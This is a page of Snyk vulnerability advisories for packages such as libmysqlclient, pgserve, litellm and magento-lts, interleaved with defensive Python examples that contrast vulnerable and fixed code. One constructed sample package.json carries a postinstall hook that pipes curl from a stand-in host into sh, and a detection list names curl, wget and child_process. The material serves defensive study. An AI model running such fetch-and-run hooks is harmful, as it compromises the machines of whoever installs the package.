32409 matches found

Snyk • added 2026/04/21 12:00 a.m.

Allocation of Resources Without Limits or Throttling

Overview: Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the Optimizer component. An attacker can cause the server to hang or crash repeatedly by sending crafted requests over the network. Remediation: Upgrade libmysqlclient to version...

CVSS 6.9 • AI score 5.5 • EPSS 0.00323
Exploits: 0 • References: 2
Snyk • added 2026/04/21 12:00 a.m.

Allocation of Resources Without Limits or Throttling

Overview: Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the Optimizer component. An attacker can cause the server to hang or crash repeatedly by sending specially crafted requests over the network. This is only exploitable if the...

CVSS 6.9 • AI score 7.7 • EPSS 0.00323
Exploits: 0 • References: 2
Snyk • added 2026/04/21 12:00 a.m.

Insertion of Sensitive Information Into Sent Data

Overview: Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data via the Information Schema component. An attacker can gain unauthorized access to sensitive data by sending crafted requests over the network. Remediation: Upgrade libmysqlclient to versi...

CVSS 5.3 • AI score 7.8 • EPSS 0.00243
Exploits: 0 • References: 2
Snyk • added 2026/04/21 12:00 a.m.

Allocation of Resources Without Limits or Throttling

Overview: Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the DML component. An attacker can cause the server to hang or crash repeatedly by sending specially crafted requests over the network. Remediation: Upgrade libmysqlclient to versio...

CVSS 6.9 • AI score 7.8 • EPSS 0.00323
Exploits: 0 • References: 2
Snyk • added 2026/04/21 12:00 a.m.

Allocation of Resources Without Limits or Throttling

Overview: Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the Optimizer component. An attacker can cause the server to hang or crash repeatedly by sending specially crafted requests over the network. Remediation: Upgrade libmysqlclient to...

CVSS 7.1 • AI score 7.8 • EPSS 0.00303
Exploits: 0 • References: 2
Snyk • added 2026/04/21 12:00 a.m.

Allocation of Resources Without Limits or Throttling

Overview: Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the InnoDB component. An attacker with high privileges can cause the server to hang or crash repeatedly by sending crafted requests over the network. Remediation: Upgrade...

CVSS 6.9 • AI score 7.7 • EPSS 0.00242
Exploits: 0 • References: 2
Snyk • added 2026/04/21 12:00 a.m.

Allocation of Resources Without Limits or Throttling

Overview: Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the JSON component. An attacker can cause the server to hang or crash repeatedly by sending specially crafted requests over the network. Remediation: Upgrade libmysqlclient to versi...

CVSS 7.1 • AI score 7.8 • EPSS 0.00303
Exploits: 0 • References: 2
Snyk • added 2026/04/21 12:00 a.m.

Missing Release of Resource after Effective Lifetime

Overview: Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime in the Group Replication Plugin. An attacker can cause the server to hang or crash repeatedly by sending crafted requests over the network. Remediation: Upgrade libmysqlclient to versi...

CVSS 7.1 • AI score 7.8 • EPSS 0.00303
Exploits: 0 • References: 2
Snyk • added 2026/04/21 12:00 a.m.

Allocation of Resources Without Limits or Throttling

Overview: Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling through the InnoDB component. An attacker with high privileges can cause the server to hang or crash repeatedly by sending crafted requests over the network. Remediation: Upgrade...

CVSS 6.9 • AI score 7.7 • EPSS 0.00323
Exploits: 0 • References: 2
Snyk • added 2026/04/21 12:00 a.m.

Allocation of Resources Without Limits or Throttling

Overview: Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the Optimizer component. An attacker can cause the server to hang or crash repeatedly by sending specially crafted requests over the network. Remediation: Upgrade libmysqlclient to...

CVSS 7.1 • AI score 7.8 • EPSS 0.00303
Exploits: 0 • References: 2
Snyk • added 2026/04/21 12:00 a.m.

Allocation of Resources Without Limits or Throttling

Overview: Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the InnoDB component. An attacker can cause the server to hang or crash repeatedly by sending specially crafted requests over the network. This is only exploitable if the attacker...

CVSS 6.9 • AI score 7.7 • EPSS 0.00242
Exploits: 0 • References: 2
Snyk • added 2026/04/21 12:00 a.m.

Improper Input Validation

Overview: Affected versions of this package are vulnerable to Improper Input Validation of certain client metadata fields when explicitly enabled. An attacker possessing a valid Initial Access Token can dynamically register a malicious client with crafted metadata. Depending on the metadata provid...

CVSS 9.6 • AI score 5.4
Exploits: 0 • References: 2
Snyk • added 2026/04/20 10:16 p.m.

Access Control Bypass

Overview: Affected versions of this package are vulnerable to Access Control Bypass through the authentication process. An attacker can maintain unauthorized access to protected resources and perform actions such as reading, modifying, or creating new accounts by using previously issued bearer...

CVSS 8.6 • AI score 5.3 • EPSS 0.00274
Exploits: 1 • References: 2
Snyk • added 2026/04/20 10:16 p.m.

Access Control Bypass

Overview: Affected versions of this package are vulnerable to Access Control Bypass through the authentication process. An attacker can maintain unauthorized access to protected resources and perform actions such as reading, modifying, or creating new accounts by using previously issued bearer...

CVSS 8.6 • AI score 5.3 • EPSS 0.00274
Exploits: 1 • References: 2
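The two Access Control Bypass entries above describe the classic failure mode of bearer tokens: a token that was issued legitimately keeps working after the session it belongs to has ended, because the server only checks the signature and expiry. The example below is an added illustration, not code from the affected package; it uses a constructed HMAC signing key and an in-memory revocation set (a real service would back both with a secret store and a shared cache). The vulnerable check accepts a logged-out token; the fixed check consults the revocation state as well.

```python
import base64
import binascii
import hashlib
import hmac
import json
import os
import time

# Constructed signing key for the example; a real service loads it from a secret store.
SIGNING_KEY = b"example-signing-key-do-not-use-in-production"

# Identifiers (jti) of tokens that have been logged out. In-memory here; a real
# deployment keeps this in a store shared by every instance that validates tokens.
REVOKED_JTIS = set()


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_token(subject: str, ttl_seconds: int = 3600, now=None) -> str:
    """Issue an HMAC-signed bearer token carrying a unique id (jti) and an expiry."""
    now = time.time() if now is None else now
    claims = {"sub": subject, "jti": _b64(os.urandom(16)), "exp": int(now + ttl_seconds)}
    body = _b64(json.dumps(claims, separators=(",", ":")).encode())
    sig = _b64(hmac.new(SIGNING_KEY, body.encode(), hashlib.sha256).digest())
    return f"{body}.{sig}"


def logout(token: str) -> None:
    """Revoke a token: remember its jti, since its signature will stay valid until expiry."""
    body = token.split(".", 1)[0]
    REVOKED_JTIS.add(json.loads(_unb64(body))["jti"])


def _verify_signature(token: str):
    """Return the claims if the signature verifies, else None."""
    body, _, sig = token.partition(".")
    try:
        expected = hmac.new(SIGNING_KEY, body.encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _unb64(sig)):
            return None
        return json.loads(_unb64(body))
    except (ValueError, binascii.Error):
        return None


def authorize_vulnerable(token: str, now=None) -> bool:
    """BUG: signature and expiry only; a token the user logged out of is still accepted."""
    now = time.time() if now is None else now
    claims = _verify_signature(token)
    return claims is not None and claims["exp"] > now


def authorize_fixed(token: str, now=None) -> bool:
    """Signature, expiry and revocation state must all pass."""
    now = time.time() if now is None else now
    claims = _verify_signature(token)
    if claims is None or claims["exp"] <= now:
        return False
    return claims["jti"] not in REVOKED_JTIS
```

The revocation set only needs to hold a jti until that token's `exp` has passed, so it stays small; an alternative with the same effect is a per-user "session version" counter embedded in the token and bumped on logout or password change.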
Snyk • added 2026/04/20 10:15 p.m.

Missing Origin Validation in WebSockets

Overview: Affected versions of this package are vulnerable to Missing Origin Validation in WebSockets: none of the WebSocket endpoints validate the Origin header. An attacker can gain unauthorized access to authenticated WebSocket sessions by tricking a logged-in administrator into visiting a malicio...

CVSS 8.1 • AI score 5.4 • EPSS 0.00176
Exploits: 1 • References: 2
Snyk • added 2026/04/20 10:15 p.m.

Missing Origin Validation in WebSockets

Overview: Affected versions of this package are vulnerable to Missing Origin Validation in WebSockets: none of the WebSocket endpoints validate the Origin header. An attacker can gain unauthorized access to authenticated WebSocket sessions by tricking a logged-in administrator into visiting a malicio...

CVSS 8.1 • AI score 5.4 • EPSS 0.00176
Exploits: 1 • References: 2
Snyk • added 2026/04/20 10:15 p.m.

Missing Origin Validation in WebSockets

Overview: Affected versions of this package are vulnerable to Missing Origin Validation in WebSockets: none of the WebSocket endpoints validate the Origin header. An attacker can gain unauthorized access to authenticated WebSocket sessions by tricking a logged-in administrator into visiting a malicio...

CVSS 8.1 • AI score 5.4 • EPSS 0.00176
Exploits: 1 • References: 2
Snyk • added 2026/04/20 10:00 p.m.

Embedded Malicious Code

Overview: pgserve is an embedded PostgreSQL server with true concurrent connections (zero config, auto-provisioned databases). Affected versions of this package are vulnerable to Embedded Malicious Code: a credential-harvesting script is injected into the package and runs via postinstall on every npm install. It...

CVSS 9.8 • AI score 5.4
Exploits: 0 • References: 2
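The pgserve entry above turns on a single npm feature: lifecycle scripts (`preinstall`, `install`, `postinstall`, `prepare`) run automatically during `npm install`, so a compromised version needs nothing more than a `postinstall` entry to execute on every developer and CI machine. The script below is an added example, not tooling from pgserve or npm: it pulls the install hooks out of a `package.json` document and attaches a few review indicators. The indicator patterns are assumptions for this example, and the sample `package.json` is constructed.

```python
import json
import re

# Lifecycle scripts npm runs on its own during `npm install` of a dependency.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Review heuristics (assumptions for this example): command shapes that pull and
# run remote code, or hide what they do, inside an install hook.
SUSPICIOUS = [
    re.compile(r"\b(curl|wget)\b"),
    re.compile(r"\bnode\s+-e\b"),
    re.compile(r"\|\s*(sh|bash)\b"),
    re.compile(r"base64"),
    re.compile(r"\b(eval|child_process)\b"),
]


def install_hooks(package_json: str) -> dict:
    """Return the install-time lifecycle scripts declared in a package.json document."""
    scripts = json.loads(package_json).get("scripts", {})
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def review_findings(package_json: str) -> list:
    """One finding per install hook; each carries the indicators its command matched."""
    findings = []
    for hook, cmd in install_hooks(package_json).items():
        hits = [p.pattern for p in SUSPICIOUS if p.search(cmd)]
        findings.append({"hook": hook, "command": cmd, "indicators": hits})
    return findings


# Constructed sample: a package whose postinstall fetches and executes a remote script.
SAMPLE_MALICIOUS = json.dumps({
    "name": "example-db-helper",
    "version": "1.2.3",
    "scripts": {
        "postinstall": "node -e \"require('child_process').exec("
                       "'curl -s https://example.invalid/setup | sh')\"",
        "test": "node test.js",
    },
})

# Constructed sample: a package with no install hooks at all.
SAMPLE_CLEAN = json.dumps({
    "name": "example-clean",
    "version": "0.1.0",
    "scripts": {"build": "tsc", "test": "node --test"},
})
```

Run `review_findings` over every `package.json` in a lockfile-resolved tree before installing (or set `ignore-scripts=true` in `.npmrc` and run the few hooks you have vetted by hand); an install hook with no indicators still deserves a look, because a hook's mere presence is the capability the malicious version relies on.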
Snyk • added 2026/04/20 10:00 p.m.

Command Injection

Overview: litellm is a library to easily interface with LLM API providers. Affected versions of this package are vulnerable to Command Injection via the preview MCP server endpoints POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list. An attacker can execute arbitrary commands by accessin...

CVSS 8.8 • AI score 6.2 • EPSS 0.75873
Exploits: 1 • References: 2
Snyk • added 2026/04/20 10:00 p.m.

Improper Verification of Cryptographic Signature

Overview: Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature in the managed authenticated encryptor while computing the HMAC validation tag. An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. Note: Shared framework...

CVSS 9.1 • AI score 5.9 • EPSS 0.11205
Exploits: 0 • References: 2
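The entry above concerns how an authenticated encryptor computes and checks its HMAC validation tag. Two properties decide whether such a tag is worth anything: it must cover every byte the decryptor will act on (header, IV and ciphertext, not just the ciphertext), and it must be compared in constant time before any decryption happens. The code below is an added example and not the affected encryptor's implementation; the keys are constructed, the "cipher" is an HMAC-based counter-mode keystream used only so the example runs with the standard library, and the `ct_only` scheme exists purely to show what an under-covered tag lets an attacker do.

```python
import hashlib
import hmac
import os

# Constructed keys; a real system derives separate encryption and MAC keys from a master key.
ENC_KEY = b"\x11" * 32
MAC_KEY = b"\x22" * 32
HEADER = b"v1"      # assumed fixed header (format version / key id) that the decryptor trusts
IV_LEN = 16
TAG_LEN = 32


def _keystream(key: bytes, iv: bytes, n: int) -> bytes:
    """PRF counter-mode keystream; illustrative stand-in for a real cipher."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hmac.new(key, iv + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:n]


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _tag_input(iv: bytes, ciphertext: bytes, scheme: str) -> bytes:
    # "full": everything the decryptor relies on is authenticated.
    # "ct_only": the bug shape; header and IV can be changed without detection.
    return HEADER + iv + ciphertext if scheme == "full" else ciphertext


def protect(plaintext: bytes, iv: bytes = None, scheme: str = "full") -> bytes:
    iv = os.urandom(IV_LEN) if iv is None else iv
    ciphertext = _xor(plaintext, _keystream(ENC_KEY, iv, len(plaintext)))
    tag = hmac.new(MAC_KEY, _tag_input(iv, ciphertext, scheme), hashlib.sha256).digest()
    return HEADER + iv + ciphertext + tag


def unprotect(blob: bytes, scheme: str = "full"):
    """Return the plaintext, or None if the validation tag does not verify."""
    hlen = len(HEADER)
    if len(blob) < hlen + IV_LEN + TAG_LEN or blob[:hlen] != HEADER:
        return None
    iv = blob[hlen:hlen + IV_LEN]
    ciphertext = blob[hlen + IV_LEN:-TAG_LEN]
    tag = blob[-TAG_LEN:]
    expected = hmac.new(MAC_KEY, _tag_input(iv, ciphertext, scheme), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):   # constant-time; never `==` on tags
        return None
    return _xor(ciphertext, _keystream(ENC_KEY, iv, len(ciphertext)))


def flip_byte(blob: bytes, index: int) -> bytes:
    """Attacker-style single-bit modification at a chosen offset."""
    out = bytearray(blob)
    out[index] ^= 0x01
    return bytes(out)
```

With the `full` scheme a flipped bit anywhere in the header, IV, ciphertext or tag is rejected before decryption; with `ct_only` a flipped IV byte passes verification and the decryptor hands back attacker-influenced plaintext, which is the class of malleability a mis-scoped validation tag introduces.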
Snyk • added 2026/04/20 9:11 p.m.

Command Injection

Overview: flowsint (the package provides no description). Affected versions of this package are vulnerable to Command Injection via the orgtoasn transform process. An attacker can execute arbitrary operating system commands as root on the host machine by supplying shell metacharacters and escaping the...

CVSS 10 • AI score 6.1 • EPSS 0.00506
Exploits: 1 • References: 2
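The flowsint entry above is the textbook shape of command injection: a value taken from the target (an organisation name) is interpolated into a shell command line, so shell metacharacters in it become commands. The example below is added here and is not flowsint's code; the external lookup tool is stood in for by `echo` so that it runs offline, and the allowed-character policy for organisation names is an assumption. It shows the vulnerable string form, the argv form that removes the shell from the path, and the allowlist check that belongs in front of it.

```python
import re
import subprocess


def lookup_vulnerable(org: str) -> str:
    """BUG: the organisation name is spliced into a command line parsed by /bin/sh."""
    return subprocess.run(f"echo query={org}", shell=True,
                          capture_output=True, text=True, check=False).stdout


def lookup_argv(org: str) -> str:
    """No shell: the value reaches the tool as a single argv entry, metacharacters and all."""
    return subprocess.run(["echo", f"query={org}"],
                          capture_output=True, text=True, check=False).stdout


# Assumed policy for this example: what an organisation name may look like.
ORG_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9 .,&'-]{0,63}")


def lookup_safe(org: str) -> str:
    """Allowlist the input first, then invoke the tool without a shell."""
    if not ORG_NAME.fullmatch(org):
        raise ValueError(f"rejected organisation name: {org!r}")
    return lookup_argv(org)


def is_rejected(org: str) -> bool:
    """True if the allowlist refuses the value (helper so callers need no try/except)."""
    try:
        lookup_safe(org)
        return False
    except ValueError:
        return True
```

The argv form alone already stops the injection; the allowlist is still worth keeping because the downstream tool may have its own option parsing (a value starting with `-` is the usual surprise), and because it documents what the transform expects.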
Snyk • added 2026/04/20 9:00 p.m.

Allocation of Resources Without Limits or Throttling

Overview: Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the Optimizer. Remediation: Upgrade libmysqlclient to version 8.1.0 or higher. References: Oracle Security Advisory; Red Hat Bugzilla Bug...

CVSS 6.9 • AI score 7.9 • EPSS 0.00323
Exploits: 0 • References: 2
Snyk • added 2026/04/20 8:12 p.m.

Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')

Overview: aws-encryption-sdk is an AWS Encryption SDK implementation for Python. Affected versions of this package are vulnerable to Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade') via the shared key cache. An attacker can bypass key commitment policy enforcement by...

CVSS 5.7 • AI score 5.7 • EPSS 0.00096
Exploits: 0 • References: 2
Snyk • added 2026/04/20 7:31 p.m.

Symlink Attack

Overview: Affected versions of this package are vulnerable to Symlink Attack via the setkey and unsetkey functions. An attacker can overwrite arbitrary files by creating a crafted symbolic link that is followed during a cross-device rename fallback. PoC (Python): import os; import sys; import tempfile...

CVSS 7.1 • AI score 5.9 • EPSS 0.00236
Exploits: 1 • References: 2
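The symlink entry above names a pattern worth seeing end to end: an atomic write creates a temp file, tries `rename()` onto the destination, and on `EXDEV` (temp file on a different filesystem) falls back to opening the destination path and copying into it. `open()` follows a symlink at that path, so an attacker who can plant a link there picks the file that gets overwritten. The code below is an added example, not the affected package's `setkey`; it forces the cross-device fallback with an injected `rename` so the bug reproduces in a scratch directory, then shows the fix: create the temp file in the destination directory, where `rename()` is always possible and replaces the link itself rather than following it.

```python
import errno
import os
import tempfile


def _rename_forcing_exdev(src, dst):
    """Stand-in for os.rename on a cross-device move (constructed for the example)."""
    raise OSError(errno.EXDEV, "Invalid cross-device link", src, dst)


def write_vulnerable(target, data, rename=os.rename):
    fd, tmp = tempfile.mkstemp()             # system temp dir: may be another filesystem
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    try:
        rename(tmp, target)
    except OSError as exc:
        if exc.errno != errno.EXDEV:
            os.unlink(tmp)
            raise
        # BUG: the copy fallback opens the destination *path*. open() follows a symlink
        # planted there, so whatever the link points at is overwritten.
        with open(target, "wb") as f:
            f.write(data)
        os.unlink(tmp)


def write_safe(target, data):
    target = os.path.abspath(target)
    # Temp file in the destination directory: same filesystem, so rename() never needs
    # a copy fallback. rename() swaps the directory entry and does not follow a symlink
    # that sits at the destination.
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(target), prefix=".tmp-")
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(data)
            f.flush()
            os.fsync(f.fileno())
        os.rename(tmp, target)
    except BaseException:
        try:
            os.unlink(tmp)
        except FileNotFoundError:
            pass
        raise


def run_demo():
    """Plant link.txt -> victim.txt in a scratch dir and write through it both ways."""
    work = tempfile.mkdtemp()
    victim = os.path.join(work, "victim.txt")
    link = os.path.join(work, "link.txt")
    with open(victim, "wb") as f:
        f.write(b"original")
    os.symlink(victim, link)

    write_vulnerable(link, b"pwned", rename=_rename_forcing_exdev)
    with open(victim, "rb") as f:
        after_vulnerable = f.read()          # victim overwritten through the link

    with open(victim, "wb") as f:
        f.write(b"original")
    write_safe(link, b"replaced")
    with open(victim, "rb") as f:
        after_safe = f.read()                # victim untouched
    with open(link, "rb") as f:
        link_content = f.read()              # link.txt is now a regular file
    return after_vulnerable, after_safe, os.path.islink(link), link_content
```

If the destination directory itself is attacker-writable the race simply moves up a level, so the directory's ownership and mode matter as much as the write routine; on platforms where `os.symlink` needs extra privilege the demo will fail at the planting step rather than at the write.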
Snyk • added 2026/04/20 7:31 p.m.

Directory Traversal

Overview: openmage/magento-lts is the home of an unofficial community-driven project. Affected versions of this package are vulnerable to Directory Traversal through the files request parameter in the dataflow import parsers. An attacker with administrative privileges can read...

CVSS 8.5 • AI score 6.6 • EPSS 0.00502
Exploits: 1 • References: 3
Snyk • added 2026/04/20 7:31 p.m.

Integer Overflow or Wraparound

Overview: Affected versions of this package are vulnerable to Integer Overflow or Wraparound in the kiss_fftnd_alloc function due to an improper allocation size calculation when handling crafted dimension values. An attacker can execute arbitrary code or cause a denial of service by supplying speciall...

CVSS 8.8 • AI score 6.3 • EPSS 0.00288
Exploits: 0 • References: 2
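The kissfft entry above is an allocation-size overflow: the byte count is a product of caller-supplied dimensions and an element size, computed in a fixed-width integer, so a large enough product wraps to a small number, the allocation succeeds, and the later writes run past it. The example below is added here and is not kissfft's code; it models 64-bit `size_t` arithmetic in Python to show the wrap, and the checked version that rejects any product exceeding `SIZE_MAX` before it multiplies. The dimension values are constructed.

```python
SIZE_MAX = 2**64 - 1   # size_t on a 64-bit platform (assumption for the example)


def wrapped_product(values, bits=64):
    """What unchecked C multiplication yields: the product reduced modulo 2**bits."""
    mask = (1 << bits) - 1
    total = 1
    for v in values:
        total = (total * v) & mask
    return total


def alloc_size_unchecked(dims, elem_size):
    """BUG pattern: product of dimensions times element size, no overflow check."""
    return wrapped_product(list(dims) + [elem_size])


def alloc_size_checked(dims, elem_size):
    """Reject non-positive inputs and any product that would exceed SIZE_MAX."""
    if elem_size <= 0:
        raise ValueError("element size must be positive")
    total = elem_size
    for d in dims:
        if d <= 0:
            raise ValueError(f"invalid dimension {d}")
        if total > SIZE_MAX // d:      # total * d would not fit in size_t
            raise OverflowError("allocation size overflows size_t")
        total *= d
    return total


def overflows(dims, elem_size) -> bool:
    """True if the checked computation refuses these inputs (helper for callers)."""
    try:
        alloc_size_checked(dims, elem_size)
        return False
    except (OverflowError, ValueError):
        return True
```

The `total > SIZE_MAX // d` test is the division-based form of the check; in C the same thing is usually written with `__builtin_mul_overflow` or by capping each dimension at a sane maximum before multiplying. Note that `[2**32, 2**32]` with an 8-byte element wraps to exactly zero, which many allocators happily satisfy.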
Snyk • added 2026/04/20 7:31 p.m.

Missing Authorization

Overview: openmage/magento-lts is the home of an unofficial community-driven project. Affected versions of this package are vulnerable to Missing Authorization through the Mage_Wishlist_SharedController shared wishlist item flow. An attacker can access or manipulate wishlist ite...

CVSS 5.4 • AI score 5.5 • EPSS 0.00176
Exploits: 1 • References: 2
Snyk • added 2026/04/20 7:31 p.m.

Arbitrary File Upload

Overview: openmage/magento-lts is the home of an unofficial community-driven project. Affected versions of this package are vulnerable to Arbitrary File Upload due to an incomplete blocklist in the file upload process. An attacker can execute arbitrary code on the server by...

CVSS 8.8 • AI score 6.1 • EPSS 0.00691
Exploits: 1 • References: 2
Snyk • added 2026/04/20 7:31 p.m.

Deserialization of Untrusted Data

Overview: openmage/magento-lts is the home of an unofficial community-driven project. Affected versions of this package are vulnerable to Deserialization of Untrusted Data via the Varien_Image file handling path and related image validation code in Varien_Image,...

CVSS 9.2 • AI score 6.8 • EPSS 0.00539
Exploits: 1 • References: 2
Snyk • added 2026/04/20 7:30 p.m.

Permissive Cross-domain Policy with Untrusted Domains

Overview: copilot-api turns GitHub Copilot into an OpenAI/Anthropic API compatible server, usable with Claude Code. Affected versions of this package are vulnerable to Permissive Cross-domain Policy with Untrusted Domains via the CORS policy combined with the unauthenticated /token endpoint. An...

CVSS 7.5 • AI score 5.8 • EPSS 0.00182
Exploits: 0 • References: 2
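The three Missing Origin Validation in WebSockets entries earlier on this page and the copilot-api CORS entry above fail the same check from two directions: the server never asks whether the browser's `Origin` header belongs to a site it trusts, so any page the victim visits can open an authenticated WebSocket or read a cross-site response. The code below is an added example and is not from either project; the allowlist is constructed. It canonicalises the `Origin` value (default ports dropped, host lower-cased, anything with a path, userinfo or fragment rejected), applies it to a WebSocket upgrade request, and builds CORS response headers that echo only an allowlisted origin, never `*` alongside credentials.

```python
from typing import Optional
from urllib.parse import urlsplit

# Constructed allowlist for the example; a real deployment loads it from configuration.
ALLOWED_ORIGINS = frozenset({"https://admin.example.com", "https://app.example.com"})


def normalize_origin(origin: str) -> Optional[str]:
    """Canonical scheme://host[:port] for an Origin header value, or None if it is not one."""
    try:
        parts = urlsplit(origin)
        port = parts.port                      # raises ValueError on a malformed port
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    # A real Origin has no path, query, fragment or userinfo. Rejecting them defeats
    # "https://evil.example/https://admin.example.com" and "https://admin.example.com@evil.example".
    if parts.path or parts.query or parts.fragment or parts.username is not None:
        return None
    default = 443 if parts.scheme == "https" else 80
    host = parts.hostname.lower()
    port = default if port is None else port
    return f"{parts.scheme}://{host}" if port == default else f"{parts.scheme}://{host}:{port}"


def origin_allowed(origin_header: Optional[str]) -> bool:
    """Missing, 'null' or unparseable Origin counts as untrusted for a cookie-authenticated session."""
    if not origin_header:
        return False
    canonical = normalize_origin(origin_header)
    return canonical is not None and canonical in ALLOWED_ORIGINS


def websocket_handshake_allowed(headers: dict) -> bool:
    """Run the Origin check on the HTTP Upgrade request before accepting the WebSocket."""
    lowered = {k.lower(): v for k, v in headers.items()}
    if lowered.get("upgrade", "").lower() != "websocket":
        return False
    return origin_allowed(lowered.get("origin"))


def cors_headers(origin_header: Optional[str]) -> dict:
    """Echo only an allowlisted origin. With no ACAO header the browser blocks the read."""
    if not origin_allowed(origin_header):
        return {}
    return {
        "Access-Control-Allow-Origin": normalize_origin(origin_header),
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }
```

Exact-match against a canonical form is the point: substring or prefix checks are what let `admin.example.com.evil.example` through, and `Vary: Origin` keeps a cache from serving one origin's allow header to another. For an endpoint that hands out credentials, such as the unauthenticated `/token` route in the entry above, the CORS check is only a mitigation; the route itself still needs authentication.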
Snyk • added 2026/04/20 6:54 p.m.

Directory Traversal

Overview: com.github.junrar:junrar is a RAR decompression library in plain Java. Affected versions of this package are vulnerable to Directory Traversal via the LocalFolderExtractor component. An attacker can overwrite files in sibling directories by tricking a user into extracting a specially...

CVSS 9.3 • AI score 6.4 • EPSS 0.00336
Exploits: 0 • References: 2
Snyk • added 2026/04/20 5:26 p.m.

Arbitrary File Upload

Overview: Affected versions of this package are vulnerable to Arbitrary File Upload due to handling concatenated tar and ZIP files as ZIP files regardless of filename, without regard to whether a file is both a tar and a ZIP file. An attacker can cause unintended files to be installed by supplying a specially crafted archi...

CVSS 5 • AI score 5.3 • EPSS 0.00144
Exploits: 0 • References: 2
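The junrar entry and the archive entry above are two checks an extractor should make before it writes anything: a member name must not resolve outside the destination directory, and the blob must not be a polyglot that one component reads as a tar and another as a ZIP (a ZIP is located from its trailer, a tar from its first header, so one file can satisfy both). The example below is added here and belongs to neither project; it builds constructed sample archives with the standard library, classifies a blob by which formats claim it, and vets ZIP member names against a destination before extraction.

```python
import io
import posixpath
import tarfile
import zipfile


def build_zip(entries):
    """Constructed sample ZIP from (name, bytes) pairs."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries:
            zf.writestr(name, data)
    return buf.getvalue()


def build_tar(entries):
    """Constructed sample uncompressed tar from (name, bytes) pairs."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tf:
        for name, data in entries:
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def archive_kinds(blob: bytes) -> set:
    """Formats that accept this blob. A ZIP is found from its end-of-central-directory
    record at the tail; a tar from the header block at the head, so tar+zip passes both."""
    kinds = set()
    if zipfile.is_zipfile(io.BytesIO(blob)):
        kinds.add("zip")
    try:
        with tarfile.open(fileobj=io.BytesIO(blob), mode="r:"):
            kinds.add("tar")
    except (tarfile.TarError, ValueError, EOFError):
        pass
    return kinds


def unsafe_members(names, dest="/srv/extract"):
    """Member names that would land outside dest once normalised (zip-slip / tar-slip)."""
    dest = posixpath.normpath(dest)
    bad = []
    for name in names:
        if "\\" in name or posixpath.isabs(name):
            bad.append(name)
            continue
        final = posixpath.normpath(posixpath.join(dest, name))
        if final != dest and not final.startswith(dest + "/"):
            bad.append(name)
    return bad


def vet_zip(blob: bytes, dest: str) -> list:
    """Return the member names if the archive is a plain ZIP whose members all stay in dest."""
    kinds = archive_kinds(blob)
    if kinds != {"zip"}:
        raise ValueError(f"refusing archive that parses as {sorted(kinds) or 'nothing'}")
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        names = zf.namelist()
    bad = unsafe_members(names, dest)
    if bad:
        raise ValueError(f"members escape {dest}: {bad}")
    return names


def safe_extract_zip(blob: bytes, dest: str) -> list:
    """Vet first, extract second."""
    names = vet_zip(blob, dest)
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        zf.extractall(dest)
    return names


def vet_fails(blob: bytes, dest: str) -> bool:
    try:
        vet_zip(blob, dest)
        return False
    except ValueError:
        return True
```

The name check is done on the normalised POSIX path rather than by looking for `..` substrings, which is what catches `sub/../../evil`; a backslash is rejected outright because Windows extractors treat it as a separator. Symlink members in tar archives are a further case this check does not cover and need their own handling (Python 3.12's `tarfile` filters address it).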
Snyk • added 2026/04/20 3:49 p.m.

SQL Injection

Overview: doris-mcp-server is an enterprise-grade Model Context Protocol (MCP) server implementation for Apache Doris. Affected versions of this package are vulnerable to SQL Injection due to improper neutralization in the query context handling process. An attacker can execute unintended SQL...

CVSS 6.9 • AI score 6.1 • EPSS 0.00655
Exploits: 0 • References: 2
Snyk • added 2026/04/20 3:49 p.m.

Arbitrary Code Injection

Overview: sglang (SGLang) is a fast serving framework for large language models and vision language models. Affected versions of this package are vulnerable to Arbitrary Code Injection via the reranking endpoint when a model file containing a malicious tokenizer.chat_template is loaded, due to...

CVSS 9.8 • AI score 6.4 • EPSS 0.00852
Exploits: 2 • References: 2
Snyk • added 2026/04/20 3:31 p.m.

Insertion of Sensitive Information into Log File

Overview: org.apache.kafka:kafka-clients is a streaming platform that can publish and subscribe to streams of records, store streams of records in a fault-tolerant durable way, and process streams of records as they occur. Affected versions of this package are vulnerable to Insertion of Sensitive...

CVSS 8.2 • AI score 5.5 • EPSS 0.00535
Exploits: 0 • References: 2
Snyk • added 2026/04/20 3:31 p.m.

Improper Validation of Specified Index, Position, or Offset in Input

